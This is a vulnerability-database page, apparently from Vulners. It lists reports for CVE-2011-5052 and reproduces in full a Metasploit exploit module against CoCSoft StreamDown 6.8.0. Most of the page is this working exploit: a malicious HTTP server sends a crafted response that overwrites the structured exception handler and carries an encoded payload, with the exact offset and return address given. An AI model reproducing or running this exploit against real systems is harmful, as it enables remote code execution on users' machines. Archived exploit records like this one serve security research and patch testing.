| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2011-5052 | 27 Dec 201100:00 | – | circl | |
| CVE-2011-5052 | 4 Jan 201219:00 | – | cve | |
| CVE-2011-5052 | 4 Jan 201219:00 | – | cvelist | |
| CVE-2011-5052 | 4 Jan 201219:55 | – | nvd | |
| CoCSoft Stream Down Buffer overflow Vulnerability | 2 Jan 201200:00 | – | openvas | |
| CoCSoft Stream Down Buffer overflow Vulnerability | 2 Jan 201200:00 | – | openvas | |
| Stack overflow | 4 Jan 201219:55 | – | prion | |
| CoCSoft Stream Down Stack Overflow | 10 Jan 201200:00 | – | saint | |
| CoCSoft Stream Down Stack Overflow | 10 Jan 201200:00 | – | saint | |
| CoCSoft Stream Down Stack Overflow | 10 Jan 201200:00 | – | saint |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'CoCSoft StreamDown 6.8.0 Buffer Overflow',
'Description' => %q{
Stream Down 6.8.0 seh based buffer overflow triggered when processing
the server response packet. During the overflow a structured exception
handler is overwritten.
},
'Author' => 'Fady Mohamed Osman <fady.mohamed.osman[at]gmail.com>',
'References' =>
[
['CVE', '2011-5052'],
['OSVDB', '78043'],
['BID', '51190'],
['URL', 'http://www.dark-masters.tk/'],
['URL', 'http://web.archive.org/web/20121024141958/http://secunia.com/advisories/47343'],
['EDB', '18283']
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{
'BadChars' => "\x00\xff\x0a"
},
'Platform' => 'win',
'Targets' =>
[
[
'StreamDown 6.8.0',
{
'Offset' => 16388,
'Ret' => 0x10019448 #POP/POP/RET in DownloadMng.dll
}
],
],
'DisclosureDate' => '2011-12-27', # as an actual security bug
'DefaultTarget' => 0,
'License' => MSF_LICENSE
))
end
def on_request_uri(cli,request)
vprint_status("Requested: #{request.uri}")
# No point to continue if the client isn't what we interested in
ua = request.headers['User-Agent']
if ua !~ /CoCSoft Stream Download/i
print_error("Target not supported: #{ua}")
send_not_found(cli)
return
end
nseh = "\xeb\x06" + rand_text_alpha(2)
seh = [target.ret].pack('V')
offset_to_nseh = target['Offset']
nops = make_nops(10)
sploit = rand_text_alpha(offset_to_nseh) + nseh + seh + nops + payload.encoded
cli.put(sploit)
close_client(cli)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation